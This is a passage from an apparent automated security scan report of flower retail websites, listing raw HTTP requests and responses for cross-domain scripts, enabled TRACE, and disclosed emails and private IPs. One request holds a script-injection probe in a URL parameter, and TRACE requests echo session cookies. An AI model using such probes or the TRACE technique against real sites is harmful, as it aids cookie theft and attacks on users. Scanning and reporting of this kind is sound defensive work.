Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.31. http://www.proflowers.com/send-flowers-bsl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
18. TRACE method is enabled  previous  next
There are 5 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://att.adpxpx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://att.adpxpx.com
Path:   /

Request

TRACE / HTTP/1.0
Host: att.adpxpx.com
Cookie: fbe867173de5b8e8

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:22 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: att.adpxpx.com
Cookie: fbe867173de5b8e8

18.2. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: 4a5b2ec768f9309f

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 72
Date: Mon, 09 May 2011 01:01:04 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: 4a5b2ec768f9309f
18.3. http://metrics.ftd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.ftd.com
Cookie: e35dd88f7dc01a60

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:40 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.ftd.com
Cookie: e35dd88f7dc01a60
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

18.4. http://pixel.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 96a1371c6c573665

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:45 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 96a1371c6c573665

18.5. http://pixel.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 2f42856becf3ae11

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:09:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 2f42856becf3ae11
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

19. Email addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media3.1800flowers.com
Path:   /800f_assets/jet/website/scripts/flowers/calendar/date.js

Issue detail

The following email address was disclosed in the response:

Request

GET /800f_assets/jet/website/scripts/flowers/calendar/date.js HTTP/1.1
Host: media3.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 08 Jun 2006 14:00:42 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: application/x-javascript
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:01:49 GMT
Connection: close
Content-Length: 12728

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...
19.2. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

Issue detail

The following email address was disclosed in the response:

Request

GET /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css HTTP/1.1
Host: media5.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Sep 2010 15:39:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/css
Cache-Control: max-age=300
Date: Mon, 09 May 2011 01:00:45 GMT
Connection: close
Content-Length: 2434

/*
************************************************
* File: survey-invitation.css
* Last Updated: 11/17/09
* Author: Eric Wright <ewright@linescale.com>
*****************************
...[SNIP]...
19.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js HTTP/1.1
Host: media5.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Sep 2010 15:15:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: application/x-javascript
Cache-Control: max-age=5400
Date: Mon, 09 May 2011 01:00:45 GMT
Connection: close
Content-Length: 61772

// jQuery JavaScript Library v1.3.2 Copyright (c) 2009 John Resig Dual licensed under the MIT and GPL licenses.
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.
...[SNIP]...
<eric@rapidsynergy.com>
...[SNIP]...
19.4. https://ww30.1800flowers.com/checkoutsignin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The following email address was disclosed in the response:

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<div class="n-chk-txtSmall">To ensure you receive your 1-800FLOWERS.COM.. email containing your sign in password please add webmaster@1800flowers.com to your address book now.</div>
...[SNIP]...
19.5. http://www.ftd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
20. Private IP addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1264
Expires: Mon, 09 May 2011 01:21:48 GMT
Date: Mon, 09 May 2011 01:00:44 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
20.2. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
20.3. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e79c99a8%26origin%3Dhttp%253A%252F%252Fww30.1800flowers.com%252Ff3e64b99ac%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.1800flowers.com%2Ffields-of-europe-mom-91637&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
